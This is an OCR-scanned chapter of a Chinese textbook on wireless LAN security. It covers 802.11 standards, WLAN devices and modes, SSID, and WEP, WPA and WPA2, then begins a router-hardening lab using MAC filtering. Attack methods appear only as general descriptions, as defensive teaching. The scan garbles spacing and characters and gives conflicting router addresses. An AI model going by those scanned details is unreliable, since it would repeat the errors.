的 装置 时 上 了 ,因为 多 了 一 台 计 算 机 共享 他 的 上 网 带宽 ,所 以 上 网 速度 实 然 变 慢 。 那 么 ,如 
何 保障 自己 的 无 线 网 络 安全 使 用 呢 ? 本 项 目 将 为 大 家 解决 这 样 的 技术 问题 。 


112 项 目 分 析 


由 于 无 线 局 域 网 自身 的 特点 , 它 的 无 线 网 络 信 号 很 容易 被 发 现 。 非 法 入 侵 者 只 需要 给 
计算 机 安装 无 线 网 卡 ,就 可 以 搜索 到 附近 的 无 线 网 络 信息 ,获取 SSID、 信 道 . 是 否 加 密 等 信 
息 。 很 多 家 用 无 线 网 络 因 为 没有 进行 相应 的 安全 设置 ,很 容易 被 人 侵 者 侵入 。 更 糟糕 的 基 ， 
由 于 * 足 网卡 ”的 出 现 , 它 可 以 捕捉 到 方圆 几 公里 范围 内 的 无 线 网 络 信号 ,而且 与 其 相配 套 的 
破解 软件 ,会 很 容易 地 破解 简单 的 加 密 方式 ,从 而 获得 网 络 使 用 权 。 

此 外 ,由 于 无 线 局 域 网 不 对 数据 帧 进行 认证 操作 .这 样 ,入 侵 者 可 以 通过 欺骗 帧 去 
重新 定向 数据 流 . 撑 乱 ARP 缓存 表 ( 表 里 的 IP 地 址 与 MAC 地址 是 一 一 对 应 的 )。 入 
侵 者 可 以 轻易 地 获得 网 络 中 站 点 的 MAC 地 址 .而 且 可 以 通过 MAC 地 址 修改 工具 来 将 
本 机 的 MAC 地 址 改 为 无 线 局 域 网 合法 的 MAC 地 址 ,或 者 通过 修改 注册 表 来 修改 
MAC 地 址 。 

除了 MAC 地 址 欺骗 手段 外 ,人 侵 者 还 可 以 拦截 会 话 帧 来 发 现 无 线 AP 中 存在 的 认证 
漏洞 ,通过 监测 AP 发 出 的 广播 帧 发 现 AP 的 存在 。 可 是 ,由 于 IEEE 802. 11 无 线 网 络 协议 
并 没有 要 求 AP 必须 证 明 自己 是 一 个 AP, 所 以 入 侵 者 可 能 会 冒充 一 个 AP 进入 无 线 网 络 ， 
然后 进一步 获取 认证 身份 信息 。 
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113 相关 知识 点 


11.3.1 无 线 局 域 网 基础 


无 线 局 域 网 (Wireless Local Area Networks, WLAN) 利用 电磁 波 在 空气 中 发 送 和 接 
收 数据 ,而 无 须 线 缆 。 作 为 传统 有 线 网 络 的 一 种 补充 和 延伸 ,无 线 局 域 网 把 个 人 从 办 公 桌 边 
解放 了 出 来 ,使 他 们 可 以 随时 随地 获取 信息 ,提高 了 员工 的 办 公 效 率 。 此 外 ,WLAN 还 有 其 
他 一 些 优点 。 它 能 够 方便 地 实施 联网 技术 ,因为 WLAN 可 以 便捷 、 迅 速 地 接纳 新 加 入 的 员 
工 , 而 不 必 对 网 络 的 用 户 管理 配置 进行 过 多 的 变动 。WLAN 还 可 以 在 有 线 网 络 布线 困难 的 
地 方 比较 容易 实施 ,使 用 WLAN 方案 , 则 不 必 再 实施 打 孔 、 数 线 等 作业 ,因而 不 会 对 建筑 设 
施 造 成 任何 损害 。 

现在 ,只 要 给 笔记 本 电脑 装 上 一 块 无 线 网 卡 , 不 管 是 在 酒店 .咖啡 馆 的 走廊 里 ,还 是 出 差 
在 外 地 ,都 可 以 摆脱 线 缆 实 现 无 线 宽带 上 网 ,甚至 可 以 在 遥远 的 外 地 进入 自己 公司 的 内 部 局 
域 网 进行 办 公 处 理 或 者 给 下 属 发 出 电子 指令 ,这 在 目前 已 经 普及 了 。 

WLAN 的 数据 传输 速率 现在 已 经 能 够 达到 300Mbps, 传 输 距离 可 远 至 20km 以 上 。 无 
线 局 域 网 是 对 有 线 联 网 方式 的 一 种 补充 和 扩展 ,使 网 上 的 计算 机 具有 可 移动 性 ,能 快速 方便 
地 解决 使 用 有 线 方式 不 易 实现 的 网 络 联通 问题 。 具 体 来 说 ,无 线 局 域 网 具有 以 下 特点 。 

(1) 安装 便捷 。 一 般 而 言 ,在 网 络 建设 中 ,施工 周期 最 长 ,对 周边 环境 影响 最 大 的 ,就 是 
网 络 布线 施工 。 在 施工 过 程 中 ,往往 需要 破 墙 据 地 穿线 架 管 。 而 无 线 局 域 网 最 大 的 优势 就 
是 免 去 或 减少 了 网 络 布线 的 工作 量 , 一 般 只 要 安装 一 个 或 多 个 无 线 接 入 点 AP(Access 
Point) 设 备 ,就 可 组 建 覆 盖 整 个 建筑 或 地 区 的 无 线 局 域 网 。 

(2) 使 用 灵活 。 在 有 线 网 络 中 ,网 络 设备 的 安放 位 置 受 网 络 信息 点 位 置 的 限制 。 而 一 
且 无 线 局 域 网 建成 后 ,在 无 线 网 络 的 信号 覆盖 区 域内 任何 一 个 位 置 都 可 以 接 和 人 网络。 

(3) 经 济 节约 。 由 于 有 线 网 络 缺 少 灵 活性 ,这 就 要 求 网 络 规划 者 尽 可 能 地 考虑 未 来 发 
展 的 需要 ,这 就 往往 导致 预 设 大 量 利 用 率 较 低 的 信息 点 。 而 一 旦 网 络 的 发 展 超出 了 设计 规 
划 ,又 要 花费 较 多 费用 进行 网 络 改造 ,而 无 线 局 域 网 可 以 避免 或 减少 以 上 情况 的 发 生 。 

(4) 易于 扩展 。 无 线 局 域 网 有 多 种 配置 方式 ,能 够 根据 需要 灵活 选择 。 这 样 , 无 线 局 域 
网 就 能 设计 成 从 只 有 几 个 用 户 的 小 型 局 域 网 到 上 千 用 户 的 大 型 网 络 ,并 且 能 够 提供 像 “ 漫 
游 "(Roaming) 等 有 线 网 络 无 法 提供 的 特性 。 

由 于 无 线 局 域 网 具有 多 方面 的 优点 ,所 以 发 展 十 分 迅速 。 在 最 近 几 年 里 ,无线 局 域 网 已 
经 在 医院 商店、 工厂 和 学 校 等 不 适合 网 络 布线 的 场合 得 到 了 广泛 应 用 。 


11.3.2 无 线 局 域 网 标准 
日 前 ,支持 无 线 网 络 的 技术 标准 主要 有 IEEE 802. 11x 系列 标准 、 家 庭 网 络 (Home RF) 


技术 、 蓝 牙 (Bluetooth) 技 术 等 。 
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1. IEEE 802. 11x 系列 标准 


IEEE 802. 11 标准 是 IEEE 在 1997 年 为 无 线 局 域 网 定义 的 一 个 无 线 网 络 通信 的 工业 
标准 ,速率 最 高 只 能 达到 2Mbps。 此 后 这 一 标准 不 断 得 到 补充 和 完善 .形成 IEEE 802. 11x 
系列 标准 。IEEE 802. 11 标准 规定 了 在 物理 层 上 人 允许 三 种 传输 技术 :红外线 、 跳 频 扩 频 和 直 
接 序列 扩 频 。 红 外 无 线 数据 传输 按 视 距 方式 传播 ,发 送 点 必须 能 直接 看 到 接收 点 ,中间 没有 
阻挡 。 红 外 无 线 数据 传输 技术 主要 有 3 种 :定向 光束 红外 传输 、 全 方位 红外 传输 和 温 反 射 红 
外 传输 。 

扩 频 通信 是 将 数据 基带 信号 频谱 扩展 几 倍 或 几 十 倍 ,以 牺牲 通信 带宽 为 代价 达到 提高 
无 线 通信 系统 的 抗 干 扰 性 和 安全 性 。 扩 频 技 术 主要 有 以 下 两 种 。 

(1) 跳 频 扩 频 通信 。 将 利用 的 频带 分 为 多 个 子 频 带 . 子 频带 又 称 为 信道 。 每 个 信道 带 
宽 相 同 ,通信 频率 由 伪 随 机 数 发 生 器 产生 的 伪 随 机 码 确定 ,变化 频率 叫 跳跃 系列 。 发 送 端 和 
接收 端 采用 相同 的 跳跃 系列 。 

(2) 直接 序列 扩 频 通信 。 将 发 送 数据 与 伪 随 机 数 发 生 器 产生 的 伪 随 机 码 进 行 异 或 操 
作 , 再 将 异 或 操作 的 结果 调制 后 发 送 ,所 有 接收 节点 使 用 相同 频段 ,发 送 端 和 接收 端 使 用 相 
同 的 伪 随 机 码 。 

IEEE 802. 11b 即 Wi-Fi( Wireless Fidelity, 无线 相 容 认 证 ), 它 利用 2. 4GHz 的 频段 。 
2. 4GHz 的 ISM(Industrial Scientific Medical) 频 段 为 世界 上 绝 大 多 数 国 家 通用 ,因此 IEEE 
802. 11b 得 到 了 最 为 广泛 的 应 用 。 它 的 最 大 数据 传输 速率 为 11Mbps ,无 须 直线 传播 。 在 动 
态 速 率 转换 时 ,如 果 无 线 信 号 变 差 ,可 将 数据 传输 速率 降低 为 5. 5Mbps、2Mbps 和 1Mbps。 
支持 的 范围 是 在 室外 为 300m, 在 办 公 环 境 中 最 长 为 100m。IEEE 802. 11b 是 所 有 WLAN 
标准 演进 的 基石 ,未 来 许多 的 系统 大 都 需要 与 IEEE 802. 11b 向 后 兼容 。 

IEEE 802. 11a( Wi-Fi5) 标 准 是 得 到 广泛 应 用 的 IEEE 802. 11b 标准 的 后 续 标 准 。 它 工 
作 在 5GHz 频段 ,传输 速率 可 达 54Mbps。 由 于 IEEE 802. 11a 工作 在 5GHz 频段 ,因此 它 与 
IEEE 802. 11 IEEE 802. 11b 标准 不 兼容 。 

IEEE 802. 11g 是 为 了 提高 传输 速率 而 制订 的 标准 , 它 采 用 2. 4GHz 频段 ,使 用 CCK 
(Complementary Code Keying, 补 码 键 控 ) 技 术 与 IEEE 802. 11b( Wi-Fi) 向 后 兼容 ,同时 它 
又 通过 采用 OFDM(Orthogonal Frequency Division Multiplexing, 正 交 频 分 多 路 复 用 ) 技 术 
支持 高 达 54Mbps 的 数据 流 。 

IEEE 802. 11n 可 以 将 WLAN 的 传输 速率 由 目前 IEEE 802. 11a 及 IEEE 802. 11g 提 
供 的 54Mbps, 提 高 到 300Mbps 甚至 高 达 600Mbps。 通 过 应 用 将 MIMO(CMaultiple-Input 
Maultiple-Output, 多 入 多 出 ) 与 OFDM 技术 相 结 合 的 MIMO OFDM 技术 ,提高 了 无 线 传 输 
质量 ,也 使 传输 速率 得 到 极 大 提升 。 和 以 往 的 IEEE 802. 11 标准 不 同 .IEEE 802. 11n 协议 
为 双 频 工作 模式 (包含 2. 4GHz 和 5GHz 两 个 工作 频段 ) ,这样 IEEE 802. 11n 就 保障 了 与 以 
往 的 IEEE 802. 11b IEEE 802. 11a、IEEE 802. 11g 标准 兼容 。 


2. 家 庭 网 络 (Home RF) 技 术 


Home RF(Home Radio Frequency) 一 种 专门 为 家 庭 用 户 设计 的 小 型 无 线 局 域 网 技术 。 
它 是 IEEE 802. 11 与 Dect( 数 字 无 绳 电话 ) 标 准 的 结合 . 旨 在 降低 语音 数据 成 本 。Home RF 
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在 进行 数据 通信 时 ,采用 IEEE 802. 11 标准 中 的 TCP/IP 传输 协议 ;进行 语音 通信 时 , 则 采 
用 数字 增强 型 无 绳 通信 标准 。 

Home RF 的 工作 频率 为 2. 4GHz。 原 来 最 大 数据 传输 速率 为 2Mbps,2000 年 8 月 , 美 
国联 邦 通信 委员 会 (FECC) 批 准 了 Home RF 的 传输 速率 可 以 提高 到 8 一 11Mbps。Home RF 
可 以 实现 最 多 5 个 设备 之 间 的 互联 。 


3. 蓝牙 技术 


蓝牙 (Bluetooth) 技 术 实 际 上 是 一 种 短 距离 无 线 数字 通信 的 技术 标准 ,工作 在 2. 4GHz 
频段 ,最 高 数据 传输 速度 为 1Mbps( 有 效 传输 速度 为 721kbps) ,传输 距离 为 10cm 一 10m, 通 
过 增加 发 射 功率 可 达到 100m。 蓝 牙 技 术 主 要 应 用 于 手机 、 笔 记 本 电脑 等 数字 终端 设备 之 间 
的 通信 和 这 些 设备 与 Internet 的 连接 。 


11.3.3 无 线 局 域 网 设备 


组 建 无 线 局 域 网 的 设备 主要 包括 :无 线 网 卡 、 无 线 访问 接 入 点 .无 线路 由 器 和 天 线 等 , 几 
平 所 有 的 无 线 网 络 产 品 中 都 自 含 无 线 发 射 /接收 功能 。 

(1) 无 线 网 卡 

无 线 网 卡 是 无 线 连 接 网 络 的 终端 设备 ,其 作用 相当 于 有 线 网 卡 在 有 线 网 络 中 的 作用 。 
无 线 网 卡 按照 接口 类 型 可 分 为 以 下 4 种 。 

@ 台式 机 专用 的 PCI 接口 无 线 网 卡 ,如 图 11-1 所 示 。 

@ 笔记 本 电脑 专用 的 PCMCIA 接口 无 线 网 卡 , 如 图 11-2 所 示 。 


图 11-1 PCI 接口 无 线 网 卡 图 11-2 PCMCIA 接口 无 线 网 卡 


@ 台式 机 和 笔记 本 电脑 均 可 用 的 USB 接口 无 线 网 卡 ,如 图 11-3 所 示 。 

@ 笔记 本 电脑 内 置 的 MINI-PCI 接口 无 线 网 卡 .如 图 11-4 所 示 。 

(2) 无 线 访 问 接 人 点 

无 线 访问 接 入 点 (Access Point, AP) 也 称 无 线 网 桥 ,主要 提供 无 线 工作 站 对 有 线 局 域 网 
的 访问 和 从 有 线 局 域 网 对 无 线 工作 站 的 访问 .在 访问 接 人 点 覆盖 范围 内 的 无 线 工作 站 可 以 
通过 它 进 行 相互 通信 ,其 作用 类 似 于 有 线 网 络 中 的 集线器 ,是 无 线 网 络 的 核心 。 无 线 AP 是 
无 线 网 和 有 线 网 之 间 沟 通 的 桥梁 。 
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图 11-3 ”USB 接口 无 线 网 卡 图 11-4 ”MINI-PCI 接口 无 线 网 卡 


无 线 AP 是 移动 计算 机 用 户 进 入 有 线 网 络 的 接 人 点 ,主要 用 于 宽带 家 庭 , 大 楼 内 部 以 及 
园区 内 部 ,典型 传输 距离 为 几 十 米 至 上 百 米 ,日 前 主要 技术 为 802. 11x 系列 。 大 多 数 无 线 
AP 还 带 有 接 入 点 客户 端 模 式 (AP Client) ,可 以 和 其 他 AP 进行 无 线 连接 ,扩展 网 络 的 覆盖 
范围 。 

室内 无 线 AP 如 图 11-5 所 示 。 此 外 ,还 有 用 于 大 楼 之 间 的 联网 通信 的 室外 无 线 AP， 
如 图 11-6 所 示 , 其 典型 传输 距离 为 几 千 米 至 几 十 千 米 ,为 难以 布线 的 场所 提供 可 靠 、 便 捷 的 
网 络 连 接 。 


图 11-5 室内 无 线 AP 图 11-6 室外 无 线 AP 


(3) 无 线路 由 器 

无 线路 由 器 (Wireless Router) 集 成 了 无 线 AP 和 宽带 路 由 器 的 功能 , 它 不 仅 具 备 AP 
的 无 线 接 入 功能 ,通常 还 支持 DHCP 防火墙 WEP 加 密 等 功能 .而 且 还 包括 了 网 络 地 址 转 
换 (NAT) 功 能 ,可 支持 局 域 网 用 户 的 网 络 连 接 共享 。 可 实现 家 庭 无 线 网 络 中 的 Internet 连 
接 共 享 ,实现 ADSL 和 小 区 宽带 的 无 线 共 享 接 入 。 

无 线路 由 器 可 以 与 ADSL Modem 或 Cable Modem 直接 相连 ,也 可 以 在 使 用 时 通过 交 
换 机 /集线器 、 宽 带路 由 器 等 局 域 网 方式 再 接 入 。 其 内 置 有 简单 的 虚拟 拨号 软件 ,可 以 存储 
用 户 名 和 密码 ,可 以 为 拨号 接 入 Internet 的 ADSL .Cable Modem 等 提供 自动 拨号 功能 ,而 
无 须 手动 拨号 。 此 外 ,无 线路 由 器 一 般 还 具备 相对 更 完善 的 安全 防护 功能 。 
288 


项 目 11 无 线 网 络 安全 | 


绝 大 多 数 无 线 宽带 路 由 器 都 拥有 4 个 LAN 端口 和 
1 个 WAN 端口 ,可 作为 有 线 宽 带路 由 器 使 用 , 如 
图 11-7 所 示 。 

(4) 天 线 

在 无 线 网 络 中 ,天线 可 以 起 到 增强 无 线 信 号 的 目的 ， 
可 以 把 它 理解 为 无 线 信号 的 放大 器 。 天 线 对 空间 不 同方 
向 具有 不 同 的 辐射 或 接收 能 力 ,而 根据 方向 性 的 不 同 ,可 
将 天 线 分 为 全 向 天 线 和 定向 天 线 两 种 。 

QO@ 全 向 天 线 。 在 水 平面 上 ,辐射 与 接收 无 最 大 方向 
的 天 线 称 为 全 向 天 线 。 全 向 天 线 由 于 无 方向 性 ,所 以 多 用 在 点 对 多 点 通信 的 中 心 点 。 比 如 
想 要 在 相 邻 的 两 幢 楼 之 间 建 立 无 线 连接 ,就 可 以 选择 这 类 天 线 , 如 图 11-8 所 示 。 

@ 定向 天 线 。 有 一 个 或 多 个 辐射 与 接收 能 力 最 大 方向 的 天 线 称 为 定向 天 线 。 定 向 天 
线 能 量 集中 ,增益 相对 全 向 天 线 要 高 ,适合 于 远 距 离 点 对 点 通信 ,同时 由 于 具有 方向 性 , 抗 干 
扰 能 力 比 较 强 。 比 如 在 一 个 小 区 里 ,需要 横 跨 几 幢 楼 建立 无 线 连接 时 ,就 可 以 选择 这 类 天 
线 , 如 图 11-9 所 示 。 


图 11-7 无 线路 由 器 


图 11-8 全 向 天 线 图 11-9 定向 天 线 


11.3.4 ”无线 局 域 网 的 组 网 模式 


根据 无 线 局 域 网 的 应 用 环境 与 需求 的 不 同 ,无 线 局 域 网 可 采取 不 同 的 组 网 模式 来 实现 
互联 。 无 线 局 域 网 组 网 模式 主要 有 两 种 :一 种 是 
无 基站 的 Ad-Hoc( 自 组 网 络 ) 模 式 ; 另 一 种 是 有 固 

定 基 站 的 Infrastructure( 基 础 结构 ) 模 式 。 

(1) Ad-Hoc 模式 

AD_HOC 无 线 网 络 Ad-Hoc 是 一 种 无 线 对 等 网 络 ,是 最 简单 的 无 
线 局 域 网 结构 ,是 一 种 无 中 心 拓 扑 结构 ,网 络 连接 
SQ J 心 的 计算 机 具有 平等 的 通信 关系 ,适用 于 少量 计算 
图 11-10 Ad_Hoc 模式 无 线 对 等 网 络 ”机 (通常 小 于 5 台 ) 的 无 线 连接 ,如 图 11-10 所 示 。 
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任何 时 候 , 只 要 两 个 或 多 个 的 无 线 网 络 接口 互相 都 在 彼此 的 无 线 覆盖 范围 之 内 ,就 可 建立 一 
个 对 等 网 ,实现 点 对 点 或 点 对 多 点 连接 。 自 组 网 络 模式 不 需要 固定 设施 ,只 需 在 每 台 计算 机 
上 安装 无 线 网 卡 就 可 以 实现 ,因此 非常 适合 组 建 临时 性 的 网 络 ,如 野外 作业 、 军 事 领域 等 。 

Ad-Hoc 结构 是 一 种 省 去 了 无 线 AP 而 搭建 起 的 对 等 网 络 结构 .由 于 省 去 了 无 线 AP， 
Ad-Hoc 无 线 局 域 网 的 网 络 架 设 过 程 十 分 简单 。 不 过 ,一 般 的 无 线 网 卡 在 室内 环境 下 有 效 
传输 距离 通常 为 40m 左右 , 当 超过 此 有 效 传输 距离 时 .就 不 能 实现 彼此 之 间 的 通信 。 因 此 ， 
该 模式 非常 适合 一 些 简 单 甚至 是 临时 性 的 无 线 互 联 需求 。 

(2) Infrastructure 模式 

Infrastructure 模式 有 一 中 心 无 线 AP, 作 为 固定 基站 ,所 有 站 点 均 与 无 线 AP 连接 ,所 
有 站 点 对 资源 的 访问 由 无 线 AP 统一 控制 。 基 础 结构 模式 是 无 线 局 域 网 最 为 普遍 的 组 网 模 
式 , 网 络 性 能 稳定 、 可 靠 ,并 可 连接 一 定数 量 的 用 户 。 通 过 中 心 无 线 AP, 还 可 把 无 线 局 域 网 
与 有 线 网 络 连接 起 来 ,如 图 11-11 所 示 。 


图 11-11 Infrastructure 模式 无 线 网 络 


11.3.5 服务 集 标识 

服务 集 标识 (Service Set Identifier,SSID) 用 来 区 分 不 同 的 无 线 网 络 , 最 多 可 以 有 32 个 
字符 ,无 线 网 卡 设置 了 不 同 的 SSID 就 可 以 进入 不 同 的 无 线 网 络 。SSID 通常 由 AP 广播 出 
来 ,通过 Windows XP 自 带 的 扫描 功能 可 以 查看 当前 区 域内 的 SSID。 出 于 安全 考虑 可 以 不 


广播 SSID, 此 时 用 户 就 要 手工 设置 SSID 才能 进入 相应 的 网 络 。 简 单 地 说 ,SSID 就 是 一 个 
无 线 局 域 网 的 名 称 . 只 有 设置 为 相同 SSID 值 的 计算 机 才能 互相 通信 。 


11.3.6 无 线 加 密 标 准 


目前 ,无线 加 密 标 准 主要 有 WEP、WPA 和 WPA2 三 种 。 
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1. WEP 加 密 标准 


WEP(Wired Equivalent Privacy, 有 线 等 效 保密 ) 无 线 加 密 协 议 使 用 RC4 加 密 算 法 , 它 
定义 了 两 种 身份 验证 的 方法 :开放 系统 和 共享 密 钥 。 在 默认 的 开放 系统 方法 中 ,用 户 即 使 没 
有 提供 正确 的 WEP 密 钥 也 能 接 入 访问 点 ,共享 密 钥 方法 则 需要 用 户 提 供 正确 的 WEP 密 钥 
才能 通过 身份 验证 。 目 前 ,常见 的 是 64 位 WEP 加 密 和 128 位 WEP 加 密 。 

WEP 安全 技术 源 自 名 为 RC4 的 RSA 数据 加 密 技 术 ,在 无 线 网 络 中 传输 的 数据 是 使 用 
一 个 随机 产生 的 密 钥 来 加 密 的 。 但 WEP 用 来 产生 这 些 密 钥 的 算法 很 快 就 被 发 现 具有 可 预 
测 性 ,对 于 入 侵 者 ,他 们 可 以 很 容易 地 截取 和 破解 这 些 密 钥 , 让 用 户 的 无 线 安全 防护 形 同 
虚设 。 

IEEE 802. 11 的 WEP 加 密 模 式 是 在 20 世纪 90 年 代 后 期 设计 的 ,当时 的 无 线 安全 防护 
效果 非常 出 色 。 然 而 ,仅仅 两 年 以 后 ,在 2001 年 8 月 .Fluhrer et al. 就 发 表 了 针对 WEP 的 
密码 分 析 ,利用 RC4 加 解密 和 IV(Initialization Vector, 初 始 向 量 ) 的 使 用 方式 的 特性 ,在 无 
线 网 络 上 偷 听 几 个 小 时 之 后 ,就 可 以 把 RC4 的 密 钥 破解 出 来 。 这 个 攻击 方式 迅速 被 传播 ， 
而 且 自 动 化 破解 工具 也 相继 推出 , WEP 加 密 变 得 发 发 可 危 。 


2. WPA 加 密 标准 


由 于 WEP 的 安全 性 较 低 ,IEEE 802. 11 组 织 开 始 制定 新 的 安全 标准 ,也 就 是 802. 11i 
协议 。 但 由 于 新 标准 从 制定 到 发 布 需要 较 长 的 周期 ,而 且 用 户 也 不 会 仅 为 了 网 络 的 安全 性 
就 放弃 原来 的 无 线 设备 ,所 以 Wi-Fi 联盟 在 新 标准 推出 之 前 ,又 在 802. 11i 草案 的 基础 上 制 
定 了 WPA(Wi-Fi Protected Access) 无 线 加 密 协议 。 

WPA 使 用 TKIP(Temporal Key Integrity Protocol, 临 时 密 钥 完整 性 协议 ) , 它 的 加 密 
算法 依然 是 WEP 中 使 用 的 RC4 加 密 算法 ,所 以 不 需要 修改 原 有 的 无 线 设备 硬件 。WPA 
针对 WEP 存在 的 缺陷 ,例如 IV 过 短 . 密 钥 管理 过 于 简单 对 消息 完整 性 没有 有 效 的 保护 等 
问题 ,通过 软件 升级 的 方式 来 提高 无 线 网 络 的 安全 性 。 

WPA 为 用 户 提供 了 一 个 完整 的 认证 机 制 .AP/ 无 线路 由 器 根据 用 户 的 认证 结果 来 决定 
是 否 允 许 其 接 入 无 线 网 络 , 认 证 成 功 后 可 以 根据 多 种 方式 (传输 数据 包 的 多 少 、 用 户 接 入 网 
络 的 时 间 等 ) 动 态 地 改变 每 个 接 入 用 户 的 加 密 密 钥 。 此 外 , 它 还 会 对 用 户 在 无 线 传输 中 的 数 
据 包 进行 MIC 编码 ,确保 用 户 数据 不 会 被 其 他 用 户 更 改 。 作 为 802. 11i 标准 的 子 集 , WPA 
的 核心 就 是 IEEE 802. 1x( 一 种 基于 端口 的 网 络 接 和 人 控制 协议 ) 和 TKIP。 

考虑 到 不 同 的 用 户 群 和 不 同 的 应 用 安全 需要 ,WPA 采用 了 两 种 应 用 模式 , 即 企业 模式 
和 家 庭 模式 。 根 据 不 同 的 应 用 模式 .WPA 的 认证 也 分 为 两 种 不 同 的 方式 ,对 于 大 型 企业 用 
户 ,802. 1x 十 EAP(Extensible Authentication Protocol, 可 扩展 认证 协议 ) 的 加 密 方式 是 最 
佳 选择 , 它 的 安全 性 非常 好 ,用 户 必 须 提供 认证 所 需 的 凭证 才能 实现 连接 。 

而 对 于 一 些 中 小 型 的 企业 网 络 或 者 家 庭 用 户 来 说 .WPA-PSK(WPA 预 共享 密 钥 ) 模 式 
更 加 适合 , 它 不 需要 专门 的 认证 服务 器 . 仅 要 求 在 每 个 WLAN 节点 (AP、 无 线路 由 器 、 网 卡 
等 ) 预 先 输入 一 个 密 钥 即 可 。 需 要 注意 的 是 .这 个 密 钥 仅仅 用 于 认证 过 程 ,而 不 是 用 于 传输 
数据 的 加 密 。 数 据 加 密 的 密 钥 是 在 认证 成 功 后 动态 生成 的 ,系统 将 保证 “一 户 一 密 ”, 不 存在 
像 WEP 那样 全 网 共享 一 个 加 密 密 钥 的 情形 ,所 以 无 线 网 络 的 安全 性 较 WEP 有 大 幅 提升 。 
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3. WPA2 加 密 标准 


前 面 已 经 提 到 ,由 于 完整 的 IEEE 802. 11i 标准 推出 尚 需 一 段 时 日 ,而 Wi-Fi 联盟 为 了 
让 新 的 安全 性 标准 能 够 尽快 被 部 署 ,以 消除 用 户 对 无 线 网 络 安 全 性 的 担忧 ,从 而 让 无 线 网 络 
的 市 场 可 以 迅速 扩展 开 来 ,因此 以 已 经 完成 的 TKIP 的 IEEE 802. 11i 第 三 版 草案 (IEEE 
802. 11i draft 3) 为 基准 ,制定 了 WPA。 而 当 IEEE 完成 并 公布 IEEE 802. 11i 无 线 局 域 网 
安全 标准 后 ,Wi-Fi 联盟 也 随即 公布 了 WPA 第 二 版 一 一 WPA2。WPA2 支持 AES( 高 级 加 
密 算法 ) ,安全 性 更 高 。 但 与 WPA 不 同 的 是 ,WPA2 需要 新 的 硬件 才能 支持 。 

WPA2 是 Wi-Fi 联盟 验证 过 的 IEEE 802. 11i 标准 的 认证 形式 , WPA2 实现 了 802. 11i 
的 强制 性 元 素 , 特别 是 Michael 算法 被 公认 彻底 安全 的 CCMP (Counter CBC-MAC 
Protocol, 计 数 器 模式 密码 块 链 消息 完整 码 协议 ) 信 息 认证 码 所 取 , 而 RC4 加 密 算法 也 被 
AES 所 取代 。 

WPA = IEEE 802. 11i draft 3 = IEEE 802. 1X/EAP 十 WEP( 选 择 性 项 目 )/TKIP 

WPA2 = IEEE 802. 11i == IEEE 802.1X/EAP 十 WEP( 选 择 性 项 目 )/TKIP/CCMP 

还 有 一 种 无 线 网 络 加 密 的 模式 就 是 WPA-PSK(TKIP) 十 WPA2-PSK(AES), 这 是 日 前 
最 强 的 无 线 加 密 模式 ,但 由 于 这 种 加 密 模 式 的 兼容 性 存在 问题 ,还 没有 被 很 多 用 户 所 使 用 。 
目前 ,使 用 最 广泛 的 是 WPA-PSK(TKIP) 和 WPA2-PSK(AES) 这 两 种 加 密 模 式 。 
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任务 :无 线 局 域 网 安全 配置 


1. 任务 目标 


(1) 熟悉 无 线路 由 器 的 安全 设置 方法 ,组建 以 无 线路 由 器 为 中 心 的 无 线 局 域 网 。 
(2) 熟悉 以 无 线路 由 器 为 中 心 的 无 线 网 络 客户 端的 安全 设置 方法 。 
(3) 了 解 无 线 加 密 标 准 。 
2. 任务 内 容 
(1) 安全 配置 无 线路 由 器 。 
(2) 安全 配置 PC1 计算 机 的 无 线 网 络 。 
(3) 安全 配置 PC2、PC3 计算 机 的 无 线 网 络 。 
(4) 连通 性 测试 。 
3. 完成 任务 所 需 的 设备 和 软件 
(1) 装 有 Windows XP 操作 系统 的 PC 3 台 。 
(2) 无 线 网 卡 3 块 (USB 接口 .TP-LINK TL-WN821N)。 
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(3) 无 线路 由 器 1 台 (TP-LINK TL-WR841N)。 
(4) 直通 网 线 2 根 。 


4. 任务 实施 步骤 


(1) 安全 配置 无 线路 由 器 

步骤 1: 把 连接 外 网 (如 Internet) 的 直通 网 线 接 人 无 线路 由 器 的 WAN 端口 ,把 另 一 直 
通 网 线 的 一 端 接 入 无 线路 由 器 的 LAN 端口 , 另 一 端口 接 人 PC1 计算 机 的 有 线 网 卡 端 口 , 如 
图 11-12 所 示 。 

步骤 2: 设置 PC1 计算 机 有 线 网 卡 的 IP 地 址 为 192. 168. 1. 10, 子 网 掩 码 为 255. 255 
.255.0, 默 认 网 关 为 192. 168. 1. 1。 再 在 IE 地址 栏 中 输入 192. 168. 1.1, 打 开 无 线路 由 器 登 
录 界 面 ,输入 用 户 名 为 admin, 密 码 为 admin, 如 图 11-13 所 示 , 单 击 “ 确 定 ” 按 钮 后 进入 设置 
界面 。 

说 明 :在 默认 情况 下 ,无 线路 由 器 的 LAN 端口 地 址 一 般 为 192. 168. 1. 11, 用户 名 和 密码 
均 为 admin, 可 查阅 无 线路 由 器 说 明 书 。 


PC2 PC3 
自动 获取 IP AAA aa DT 


图 11-12 Infrastructure 模式 无 线 局 域 网 拓扑 结构 图 11-13 无 线路 由 器 登录 界面 


步骤 3: 进入 设置 界面 以 后 ,选择 左 侧 向 导 菜 单 中 的 “网 络 参数 ”一 “LAN 口 设置 ?链接 
后 ,在 右 侧 窗 格 中 可 设置 LAN 口 的 IP 地址 ,一 般 默 认为 192. 168. 1.1, 如 图 11-14 所 示 。 

步骤 4: 单 击 左 侧 向 导 菜 单 中 的 “网 络 参数 "~ “WAN 口 设 置 ?链接 ,在 右 侧 窗 格 中 可 设 
置 WAN 口 的 连接 类 型 ,如 图 11-15 所 示 。 对 于 家 庭 用 户 ,一般 是 通过 ADSL 拨号 接 人 互联 
网 , 需 选择 PPPoE 连接 类 型 ,再 输入 服务 商 提 供 的 上 网 账号 和 上 网 口令 (密码 ) 即 可 ;对 于 通 
过 局 域 网 接 入 互联 网 的 用 户 , 需 选 择 “ 动 态 IP? 或 “静态 IP”( 需 设置 静态 IP 地 址 、 子 网 掩 码 、 
网 关 等 参数 ) 连 接 类 型 。 单 击 “ 保 存 ” 按 钮 。 

步骤 5: 单 击 左 侧 向 导 菜单 中 的 “无 线 设置 ?一 无线 MAC 地 址 过 滤 ” 链 接 , 单 击 右 侧 窗 
格 中 的 “启用 过 滤 ” 按 钮 .选中 “允许 ” 单 选 按 钮 ,再 通过 “添加 新 条 上 日 ”按钮 ,把 可 以 访问 无 线 
网 络 的 计算 机 (PC1、PC2、PC3) 的 无 线 网 卡 的 MAC 地 址 添加 到 列表 中 ,如 图 11-16 所 示 , 不 
在 列表 的 计算 机 则 不 能 访问 无 线 网 络 。 
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马 TL-YR84IN — Wicrosoft Internet Explorer 加 ela 
